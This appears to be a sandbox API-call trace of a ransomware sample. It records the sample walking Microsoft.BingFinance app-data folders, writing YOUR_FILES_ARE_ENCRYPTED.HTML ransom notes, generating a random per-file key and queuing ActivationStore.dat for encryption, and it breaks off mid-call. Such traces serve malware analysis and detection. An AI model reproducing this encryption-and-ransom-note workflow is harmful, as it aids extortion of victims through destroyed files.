lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState" [0115.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState\\*" [0115.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.104] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.104] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.105] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.105] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.105] GetProcessHeap () returned 0x600000 [0115.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.106] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.107] CloseHandle (hObject=0x324) returned 1 [0115.107] GetProcessHeap () returned 0x600000 [0115.107] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.107] GetProcessHeap () returned 0x600000 [0115.107] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.108] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.108] StrStrIW (lpFirst="Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.108] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe") returned 135 [0115.108] GetProcessHeap () returned 0x600000 [0115.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.109] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe" [0115.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\*" [0115.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.109] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.109] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.110] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.110] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned 151 [0115.110] GetProcessHeap () returned 0x600000 [0115.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.111] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" [0115.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*" [0115.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.115] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0115.115] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3102f837, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3102f837, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.115] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.115] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 171 [0115.115] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.115] lstrlenW (lpString=".dat") returned 4 [0115.116] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.116] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0115.116] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0115.116] GetProcessHeap () returned 0x600000 [0115.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0115.120] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="89") returned 2 [0115.120] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="94") returned 2 [0115.120] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="47") returned 2 [0115.120] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="05") returned 2 [0115.120] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="41") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="10") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="4B") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="69") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="72") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="51") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="77") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="60") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="93") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="07") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="C3") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="2A") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="8D") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="22") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="F7") returned 2 [0115.120] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="76") returned 2 [0115.120] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="53") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="87") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A3") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="8F") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="0C") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="B2") returned 2 [0115.120] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="72") returned 2 [0115.121] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="A0") returned 2 [0115.121] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="6A") returned 2 [0115.121] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="17") returned 2 [0115.121] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F8") returned 2 [0115.121] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="07") returned 2 [0115.122] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.122] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.122] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0115.122] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x30e65d2d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.122] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.122] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 176 [0115.122] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.122] lstrlenW (lpString=".LOG1") returned 5 [0115.122] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.122] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x30e65d2d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.122] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.122] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 176 [0115.122] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.122] lstrlenW (lpString=".LOG2") returned 5 [0115.122] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.122] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x30e65d2d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184998, dwReserved1=0x31882b8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.122] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.122] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 181 [0115.122] GetProcessHeap () returned 0x600000 [0115.122] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.132] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.134] CloseHandle (hObject=0x320) returned 1 [0115.134] GetProcessHeap () returned 0x600000 [0115.134] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.134] GetProcessHeap () returned 0x600000 [0115.134] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.136] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30e197ac, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e65d2d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e65d2d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.136] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.136] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 165 [0115.136] GetProcessHeap () returned 0x600000 [0115.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.138] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.139] CloseHandle (hObject=0x324) returned 1 [0115.139] GetProcessHeap () returned 0x600000 [0115.139] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.139] GetProcessHeap () returned 0x600000 [0115.139] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.140] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.140] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.140] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState") returned 97 [0115.140] GetProcessHeap () returned 0x600000 [0115.140] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.141] lstrcpyW (in: lpString1=0x314b010, 